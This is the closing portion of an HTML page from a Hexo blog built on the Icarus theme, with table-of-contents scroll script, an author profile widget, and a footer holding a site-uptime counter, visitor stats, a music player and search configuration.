                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">23</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>